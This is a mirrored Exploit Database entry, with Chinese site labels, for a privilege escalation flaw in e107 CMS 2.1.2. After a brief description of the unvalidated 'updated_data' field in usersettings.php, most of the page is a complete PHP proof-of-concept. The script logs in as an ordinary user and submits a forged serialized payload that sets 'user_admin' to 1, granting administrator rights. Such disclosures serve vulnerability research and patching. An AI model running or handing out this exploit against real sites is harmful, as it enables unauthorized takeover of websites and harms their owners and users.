e107 CMS 2.1.2 – Privilege Escalation

• Exploit Database
• 147 阅读

• 作者： Kacper Szurek
  日期： 2016-11-09
• 类别：

  • webapps
  平台：

  • php
• 来源：https://www.exploit-db.com/exploits/40746/
• 1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31 32 33 34 35 36 37 38 39 40 41 42 43 44 45 46 47 48 49 50 51 52 53 54 55 56 57 58 59 60 61 62 63 64 65 66

  # Exploit Title: e107 CMS 2.1.2 Privilege Escalation # Date: 09-11-2016 # Software Link: http://e107.org/ # Exploit Author: Kacper Szurek # Contact: http://twitter.com/KacperSzurek # Website: http://security.szurek.pl/ # Category: webapps 1. Description   Datas from <code>$_POST[&apos;updated_data&apos;]</code> inside <code>usersettings.php</code> are not properly validated so we can set <code>user_admin</code>.   http://security.szurek.pl/e107-cms-211-privilege-escalation.html   2. Proof of Concept   <?php   /** * e107 CMS 2.1.2 Privilege Escalation * Kacper Szurek * http://security.szurek.pl */ function hack($url, $login, $pass, $cookie){   $ckfile = dirname(__FILE__) . $cookie; $cookie = fopen($ckfile, &apos;w&apos;) or die("Cannot create cookie file");   $ch = curl_init(); curl_setopt($ch, CURLOPT_URL, $url); curl_setopt($ch, CURLOPT_COOKIEJAR, $cookie); curl_setopt($ch, CURLOPT_TIMEOUT, 10); curl_setopt($ch, CURLOPT_FOLLOWLOCATION, 1); curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1); curl_setopt($ch, CURLOPT_POSTFIELDS, http_build_query(array(&apos;username&apos; => $login, &apos;userpass&apos; => $pass, &apos;userlogin&apos; => &apos;Sign In&apos;))); curl_setopt($ch, CURLOPT_POST, 1); $content = curl_exec($ch); if (strpos($content, &apos;?logout&apos;) === false) { die("Cannot login"); }   $data = array(); $data[&apos;user_admin&apos;] = 1; $data[&apos;user_perms&apos;] = 0; $data[&apos;user_password&apos;] = md5($pass);   curl_setopt($ch, CURLOPT_URL, $url.&apos;/usersettings.php&apos;); curl_setopt($ch, CURLOPT_POSTFIELDS, http_build_query(array(&apos;SaveValidatedInfo&apos; => 1, &apos;updated_data&apos; => base64_encode(serialize($data)), &apos;updated_key&apos; => md5(serialize($data)), &apos;currentpassword&apos; => $pass))); $content = curl_exec($ch);   if (strpos($content, &apos;Settings updated&apos;) === false) { die("Exploit probably failed"); }   die(&apos;OK!&apos;); }   $url = "http://url_here";   // Standard user credentials $user = "login_here"; $pass = "password_here";   $cookie = "/cookie.txt"; hack($url, $user, $pass, $cookie);